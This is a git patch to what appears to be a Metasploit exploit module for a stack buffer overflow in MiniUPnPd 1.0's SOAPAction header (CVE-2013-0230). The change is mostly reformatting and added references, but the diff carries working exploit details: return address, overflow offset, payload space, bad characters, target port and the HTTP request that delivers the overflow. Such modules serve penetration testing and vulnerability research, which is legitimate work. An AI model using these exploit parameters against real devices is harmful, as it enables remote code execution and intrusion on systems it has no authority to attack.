From 3111013991e6ee87487b0c892e1f15e8d0a8617d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 4 Jun 2013 08:53:52 -0500 Subject: [PATCH] Minor cleanup for miniupnpd_soap_bof --- .../exploits/linux/upnp/miniupnpd_soap_bof.rb | 70 +++++++++++-------- 1 file changed, 42 insertions(+), 28 deletions(-) diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index 8573869732..58d4070288 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -9,41 +9,56 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient - Rank = NormalRanking + Rank = NormalRanking def initialize(info = {}) super(update_info(info, - 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution', - 'Description' => - %q{ - This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability present - in the SOAPAction HTTP header. - }, - 'Author' => [ 'Dejan Lukan' ], - 'License' => MSF_LICENSE, - 'DefaultOptions' => { 'EXITFUNC' => 'process', }, + 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution', + 'Description' => %q{ + This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability + present in the SOAPAction HTTP header handling. + }, + 'Author' => + [ + 'hdm', # Vulnerability discovery + 'Dejan Lukan' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'EXITFUNC' => 'process', }, # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the # input, which is why it can't be part of the shellcode (otherwise the vulnerable part # of the program is never reached) - 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true }, - 'Platform' => 'linux', - 'References' => [ - [ 'CVE', '2013-0230' ], - [ 'OSVDB', '89624' ], - ], - 'Targets' => + 'Payload' => + { + 'Space' => 2060, + 'BadChars' => "\x00\x22", + 'DisableNops' => true + }, + 'Platform' => 'linux', + 'References' => [ - ['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }], + [ 'CVE', '2013-0230' ], + [ 'OSVDB', '89624' ], + [ 'BID', '57608' ], + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play'] ], - 'DefaultTarget' => 0, - 'Privileged' => false, - 'DisclosureDate' => 'Mar 27 2013', - )) + 'Targets' => + [ + [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0', + { + 'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd + 'Offset' => 2123 + } + ], + ], + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Mar 27 2013', + )) - register_options( - [ - Opt::RPORT(5555), - ], self.class) + register_options([ + Opt::RPORT(5555), + ], self.class) end def exploit @@ -92,14 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote "\r\n" + "\r\n" - # # Build and send the HTTP request # print_status("Sending exploit to victim #{target.name} at ...") send_request_cgi({ 'method' => 'POST', - 'uri' => target_uri.path, + 'uri' => "/", 'headers' => { 'SOAPAction' => sploit, },